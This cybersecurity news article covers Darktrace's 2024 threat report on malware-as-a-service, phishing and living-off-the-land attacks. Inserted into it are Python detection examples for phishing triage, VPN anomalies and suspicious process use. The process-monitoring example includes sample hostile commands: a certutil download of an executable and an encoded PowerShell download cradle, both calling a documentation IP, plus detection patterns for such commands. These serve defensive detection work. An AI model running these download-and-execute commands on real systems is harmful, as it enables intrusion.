Information Security Buzz

Darktrace Report Highlights the Growing Power of MaaS, Sneaky Evasion Tactics

By Kirsten Doyle, February 20, 2025 (4 min read)

Cybercrime-as-a-Service (CaaS) is more than just a trend—it’s here to stay. As sophisticated attack tools become widely (and easily) available, even less experienced cybercriminals can now carry out highly disruptive campaigns.  

In fact, Malware-as-a-Service (MaaS) now makes up 57% of detected threats—a 17% increase from the first half of last year. This surge makes it clear that CaaS models, particularly Ransomware-as-a-Service (RaaS) and MaaS, continue to fuel cybercrime at scale, arming adversaries with the tools they need to launch more frequent and complex attacks with minimal effort.

This was one of the findings of Darktrace’s 2024 Annual Threat Report, which provides insights observed by its Threat Research team using its Self-Learning AI across its customer fleet of nearly 10,000, spanning all major industries globally. 

A RAT Infestation 

Darktrace researchers also observed a dramatic increase in Remote Access Trojans (RATs). 

RATs were detected in 46% of malicious campaigns in the latter half of 2024, up from just 12% in the first half. These tools allow malefactors to remotely control infected devices, facilitating data exfiltration, credential theft, and surveillance.  

Researchers also tracked ransomware campaigns using emerging and re-emerging strains, including Lynx, Akira, RansomHub, Black Basta, Fog, and Qilin. 

Hook, Line, and Sinker 

Phishing remains the top attack vector, with a whopping 30.4 million phishing emails detected across Darktrace’s customer fleet in 2024.  

Malicious actors are honing their tactics, harnessing AI-generated text, social engineering, and trusted third-party services to fly under the radar. Key findings from the report include: 

  • 38% of phishing attacks were spear-phishing campaigns targeting high-value individuals. 
  • 32% used novel AI-generated text, incorporating complex linguistic patterns to appear more credible. 
  • 70% of phishing emails passed DMARC authentication checks. DMARC confirms only that the message was authorised by the From domain, so mail sent from attacker-registered or compromised domains with valid SPF and DKIM passes just as cleanly as legitimate mail.
  • 55% evaded traditional security layers before detection. 
  • Over 940,000 malicious QR codes were identified in phishing attacks. 

Attackers are also increasingly turning to third-party platforms such as Zoom Docs, QuickBooks, HelloSign, Adobe, and Microsoft SharePoint to deliver phishing lures. Because the notification email is generated and sent by the platform itself, it carries that platform's legitimate, authenticated sender domain and reputation, so domain-reputation and authentication-based controls let it through; the malicious content sits in the document or link the notification points to.
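The DMARC and trusted-platform findings above share one lesson: sender authentication is necessary but not sufficient. The following Python triage routine is an added example (not code from the Darktrace report or from this article) that parses a message's Authentication-Results and From headers and then applies the checks that the report's numbers argue for: a DMARC pass is only useful if the From domain is one the recipient actually expects, a brand name inside an unexpected domain is a lookalike, and a platform notification should link back to that platform. The allow-list of expected domains, the two sample messages, and the crude eTLD+1 helper are assumptions for the demo.

```python
"""Triage a phishing candidate that passes DMARC.

Added example, not code from the Darktrace report or this article. It reads
an RFC 5322 message, parses the Authentication-Results and From headers and
applies two checks: a DMARC pass only proves the From domain authorised the
message, so that domain must also be one the recipient expects; and a
notification from a trusted SaaS platform should link back to that platform.
"""
import email
import email.utils
import re
from email import policy
from urllib.parse import urlparse

# Hypothetical allow-list of registrable domains the organisation expects
# platform notifications from (assumed values, not from the article).
EXPECTED_SENDERS = {"sharepointonline.com", "hellosign.com", "intuit.com"}

AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=(pass|fail|none|softfail|neutral|temperror|permerror)\b", re.I)
HEADER_FROM_RE = re.compile(r"header\.from=([A-Za-z0-9.-]+)", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)


def registrable(host: str) -> str:
    """Crude eTLD+1 (last two labels); use a public-suffix library in production."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def parse_auth_results(raw: str) -> dict:
    """Extract spf/dkim/dmarc verdicts and the DMARC-aligned From domain."""
    results = {m.group(1).lower(): m.group(2).lower() for m in AUTH_RE.finditer(raw)}
    m = HEADER_FROM_RE.search(raw)
    results["header_from"] = m.group(1).lower() if m else ""
    return results


def triage(raw_message: bytes) -> list[str]:
    """Return a list of findings; an empty list means nothing looked wrong."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    auth = parse_auth_results(str(msg.get("Authentication-Results", "")))
    _, addr = email.utils.parseaddr(str(msg.get("From", "")))
    from_domain = registrable(addr.rsplit("@", 1)[-1]) if "@" in addr else ""
    findings = []

    if auth.get("dmarc") != "pass":
        findings.append(f"dmarc={auth.get('dmarc', 'missing')}")
    # A DMARC pass authenticates the domain, not the sender's intent: a domain
    # the attacker registered (or compromised) passes just as cleanly.
    if from_domain and from_domain not in EXPECTED_SENDERS:
        findings.append(f"unexpected-sender:{from_domain}")
    # Brand token of an expected sender appearing inside a different domain.
    for known in sorted(EXPECTED_SENDERS):
        brand = known.split(".")[0]
        if from_domain != known and brand in from_domain:
            findings.append(f"lookalike-of:{known}")
    # Links in a platform notification should resolve to the platform itself.
    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content() if body else ""
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname or ""
        if registrable(host) != from_domain:
            findings.append(f"link-off-domain:{host}")
    return findings


# Constructed sample messages for the demo (not real captures).
PHISH = b"""From: HelloSign <noreply@hellosign-docs.com>
To: finance@example.com
Subject: Document awaiting your signature
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=hellosign-docs.com; dkim=pass header.d=hellosign-docs.com; dmarc=pass header.from=hellosign-docs.com
Content-Type: text/plain; charset=utf-8

Please review and sign: https://login-portal.example-cdn.net/sign/1234
"""

LEGIT = b"""From: HelloSign <noreply@hellosign.com>
To: finance@example.com
Subject: Document awaiting your signature
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=hellosign.com; dkim=pass header.d=hellosign.com; dmarc=pass header.from=hellosign.com
Content-Type: text/plain; charset=utf-8

Please review and sign: https://app.hellosign.com/sign/1234
"""

if __name__ == "__main__":
    print(triage(PHISH))  # unexpected sender, lookalike, off-domain link
    print(triage(LEGIT))  # []
```

The phishing sample passes every authentication check yet produces three findings, which is the point: treat `dmarc=pass` as a precondition for trusting the From domain, not as a verdict on the message. The real platform-abuse case (a genuine HelloSign or SharePoint notification pointing at an attacker's document) passes all of these checks too, so the link target and the document itself still need detonation or content inspection.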

Hiding in Plain Sight 

Rather than causing immediate disruption, cybercriminals are prioritizing stealth and persistence. The report highlights a surge in edge device vulnerabilities and Living-off-the-Land (LOTL) techniques, which involve the use of legitimate system tools for malicious activity. 

Key trends include: 

  • 40% of campaign activity in early 2024 targeted internet-facing devices, exploiting vulnerabilities in Ivanti Connect Secure, Ivanti Policy Secure, Palo Alto Networks PAN-OS firewalls, and Fortinet appliances. 
  • Darktrace detected anomalous activity on Palo Alto firewalls 17 days before public disclosure of PAN-OS exploitation on 12 April 2024. 
  • Attackers increasingly used stolen credentials to gain initial access to remote network solutions such as VPNs. 
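Stolen credentials defeat the VPN's own check, because the login is valid; what remains is context. As an added example (not code from the Darktrace report or this article), the Python below runs two behavioural rules over constructed VPN authentication records: a success from a country absent from the user's history, and two successes from different countries closer together than any real journey allows. The log format and the pre-enriched `geo=` field are assumptions; a real deployment would seed the per-user baseline from historical data rather than from the same batch.

```python
"""Flag VPN logins that look like stolen credentials in use.

Added example, not code from the Darktrace report or this article. Valid
credentials produce a successful authentication, so the signal has to come
from context: a country the user has never logged in from, or two successes
from different countries inside a window no real journey fits. The log
format and the geo= field (assumed enriched upstream by the VPN concentrator
or SIEM) are hypothetical.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) result=(?P<result>\S+) src=(?P<src>\S+) geo=(?P<geo>\S+)$"
)


def parse(line: str):
    """Parse one record into a dict, or None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ev


def detect(lines, travel_window=timedelta(hours=1)):
    """Return (rule, user, detail, src) tuples for anomalous successful logins."""
    events = sorted(
        (ev for ev in map(parse, lines) if ev and ev["result"] == "success"),
        key=lambda ev: ev["ts"],
    )
    seen = defaultdict(set)  # user -> countries observed so far (baseline)
    last = {}                # user -> most recent successful login
    alerts = []
    for ev in events:
        user, geo = ev["user"], ev["geo"]
        # Rule 1: success from a country absent from the user's history.
        # A user's very first login only builds the baseline and is not alerted on.
        if seen[user] and geo not in seen[user]:
            alerts.append(("new-country", user, geo, ev["src"]))
        # Rule 2: two successes from different countries inside the window.
        prev = last.get(user)
        if prev and prev["geo"] != geo and ev["ts"] - prev["ts"] <= travel_window:
            alerts.append(("impossible-travel", user, f"{prev['geo']}->{geo}", ev["src"]))
        seen[user].add(geo)
        last[user] = ev
    return alerts


# Constructed sample log (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = """
2024-06-01T08:02:11Z user=jsmith result=success src=198.51.100.7 geo=GB
2024-06-02T08:05:40Z user=jsmith result=success src=198.51.100.7 geo=GB
2024-06-03T07:55:00Z user=alee result=success src=192.0.2.19 geo=US
2024-06-03T08:12:44Z user=jsmith result=success src=198.51.100.7 geo=GB
2024-06-03T08:40:10Z user=jsmith result=success src=203.0.113.55 geo=RO
2024-06-03T09:15:02Z user=jsmith result=failure src=203.0.113.55 geo=RO
""".strip().splitlines()

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The fourth `jsmith` record trips both rules: Romania is not in the user's baseline, and it arrives 28 minutes after a success from Great Britain. The failed attempt afterwards is ignored by design; a credential-stuffing pattern would be a separate rule over failures. Neither rule fires when the attacker logs in from the victim's usual country, which is why the report's point about stronger authentication stands: phishing-resistant MFA on the VPN removes the value of the stolen password rather than trying to spot its use.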

These tactics are hard for traditional security tools to detect, because the same binaries and commands appear in legitimate administrative activity and the tools struggle to tell sanctioned use from malicious use.

By using built-in system tools, attackers also reduce their reliance on custom malware, which signature- and hash-based controls can catch once its indicators of compromise (IoCs) become public.
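Because the binaries involved are legitimate and signed, a living-off-the-land detection cannot key on file hashes or names; it has to look at how the tool was invoked, who launched it, and what an encoded command actually contains. The following Python is an added example (not code from the Darktrace report or this article) that applies those three checks to constructed process-creation events shaped like Sysmon Event ID 1 records. The argument patterns, parent/child pairings, and sample events are assumptions for the demo.

```python
"""Behavioural detection of living-off-the-land activity in process-creation logs.

Added example, not code from the Darktrace report or this article. Because
the binaries are legitimate and signed, hash or file-name IoCs do not help;
the rules below key on how the tool was invoked (arguments), who launched it
(parent process) and what an encoded PowerShell command really contains.
The event shape mimics Sysmon Event ID 1 fields; the events are constructed.
"""
import base64
import re

# LOLBin -> argument patterns with no place in routine administrative use.
SUSPICIOUS_ARGS = {
    "certutil.exe": [r"-urlcache", r"-decode", r"-encode"],
    "bitsadmin.exe": [r"/transfer"],
    "mshta.exe": [r"https?://", r"javascript:"],
    "rundll32.exe": [r"javascript:"],
    "regsvr32.exe": [r"/i:https?://", r"scrobj\.dll"],
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string|net\.webclient|invoke-webrequest",
    re.I,
)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """PowerShell -EncodedCommand is base64 over UTF-16LE; recover the script text."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(event: dict) -> list[str]:
    """Return behavioural findings for one process-creation event."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event["CommandLine"]
    findings = []
    # Rule 1: a known LOLBin invoked with download/decode style arguments.
    for pat in SUSPICIOUS_ARGS.get(image, []):
        if re.search(pat, cmd, re.I):
            findings.append(f"{image}:{pat}")
    # Rule 2: an Office application spawning a shell or script host.
    if parent in OFFICE_PARENTS and image in SHELLS:
        findings.append(f"office-spawned-shell:{parent}->{image}")
    # Rule 3: decode -EncodedCommand and inspect the script for a download cradle.
    if image in {"powershell.exe", "pwsh.exe"}:
        script = decode_encoded_command(cmd)
        if script is not None:
            findings.append("powershell-encoded-command")
            if CRADLE_RE.search(script):
                findings.append("encoded-download-cradle")
    return findings


# Constructed sample events. The encoded script is built here so the demo is
# self-contained; in a real event it arrives already encoded.
_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')"
_ENC = base64.b64encode(_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.9/p.exe C:\ProgramData\p.exe"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoP -W Hidden -Enc {_ENC}"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(basename(ev["Image"]), "->", assess(ev) or "clean")
```

The third event is a scheduled script that a hash- or name-based rule on `powershell.exe` would flag just as loudly as the second; keying on arguments, parent and decoded content is what separates them. Decoding `-EncodedCommand` also removes the cheapest evasion available to the attacker: the base64 blob looks different on every host even when the script is identical.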

Core Enablers of Crime 

Jason Soroko, Senior Fellow at Sectigo, says MaaS and CaaS are no longer niche tools—they have become core enablers of an evolving threat landscape. “Malware now drives over half of all attacks, and threat actors don’t just breach defenses, they live off them, using trusted platforms and overlooked vulnerabilities to evade detection. The numbers leave no room for complacency because identity remains an expensive, unresolved liability.” 

Email phishing, once a simple tactic, Soroko says, now employs sophisticated, automated techniques that outwit conventional security. “Attackers exploit edge devices and SaaS credentials with precision, blending malicious activity into normal operations. The bad guys have taught us that identity is at the center of their success and we have largely failed to put stronger locks on the doors with better forms of authentication.” 

It’s Not Just About Causing Chaos 

The rise of CaaS is changing the game, making it easier for malefactors to carry out sophisticated threats across multiple channels, adds J Stephen Kowski, Field CTO at SlashNext. “Phishing is no longer limited to email and often uses cloud app abuse techniques leveraging OneDrive, DocuSign, and Dropbox. Attacks now flow through Teams, Slack, LinkedIn messages, and mobile channels, creating a broader threat surface. 

“It’s not just about causing chaos anymore; attackers are getting better at sneaking around using trusted tools and exploiting vulnerabilities in everyday devices to stay hidden,” Kowski explains.  

Modern security requires real-time detection and prevention that works across every communication channel, particularly since conventional tools struggle to keep pace with these evolving attack patterns.

Kirsten Doyle, Information Security Buzz News Editor

Kirsten Doyle has been in the technology journalism and editing space for nearly 24 years, during which time she has developed a great love for all aspects of technology, as well as words themselves. Her experience spans B2B tech, with a lot of focus on cybersecurity, cloud, enterprise, digital transformation, and data centre. Her specialties are in news, thought leadership, features, white papers, and PR writing, and she is an experienced editor for both print and online publications.
